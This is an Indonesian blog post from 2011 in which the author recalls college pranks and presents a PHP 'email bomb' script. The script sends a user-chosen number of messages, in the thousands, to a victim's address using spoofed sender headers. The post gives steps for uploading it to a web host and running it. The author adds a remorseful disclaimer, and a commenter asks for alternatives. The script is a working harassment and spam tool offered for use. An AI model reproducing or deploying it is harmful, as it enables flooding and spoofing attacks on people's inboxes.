Senin, 05 Desember 2011

BOOM E-MAIL



Ini kerjaan usil waktu masih duduk dibangku kuliah mulai dari belajar ngehack, ngedeface, mencuri Quota temen ampe ngirim pesan ke email temen yang jumlahnya ribuan bahkan jutaan. saya akan ngebahas kejahatan saya bagian ngirim mail yang jumlahnya ribuan, tapi sekarang saya udah nyadar kalo hal itu salah, gak ada gunanya, gakda untungnya dan tak layak untuk ditiru. Jadi mohon di maafkan ya teman - teman kalo saya pernah ngusilin kalian. Hehe... 

berikut contoh potongan programnya:

<html>
<body>
<form method=post action=index.php>
<pre>
<input type=hidden value=ok name=ok>
Dari : <input name=dari value="<? echo $dari;?>">
Kepada : <input name=kepada value="<? echo $kepada;?>">
Jumlah : <input name=jumlah value="<? echo $jumlah;?>">
Isi Pesan: <textarea name=isi><?echo $isi?></textarea><br>
<input type=submit value=Booom>
</form></pre>
<?
if ($ok=="ok")
{
for ($i=0;$i<$jumlah;$i++)
{
$a=$i.$dari;
mail($kepada,$isi,"","From : $a <$a>");
}
echo ("Beres Bos");
}
?>
</body>
</html>

lalu simpan program berikut dalam sebuah file misalkan index.php. selanjutnya masukkan file tersebut dalam webserver atau webhosting kamu. Langkah berikutnya buka browser lalu masukkan alamat dimana kamu menyimpan file tersebut misalkan http://namahostkamu.com/index.php .Jika alamat e-mail yang ditujukan benar maka akan secara otomatis mengerimkan pesan ke email korban.
Pesan terakhir jangan dilakukan karna tuhan maha tahu dan kalo ada salah kata mohon di maafkan
NB:
artikel ini hanya untuk ilmu pengetahuan semata, penyalah gunaan artikel ini diluar dari tanggung jawab penulis
Adsense Indonesia

1 comments:

ga berhasil gan.. udah coba ke email aku tapi ga berhasill... mungkin ada cara lain???

Posting Komentar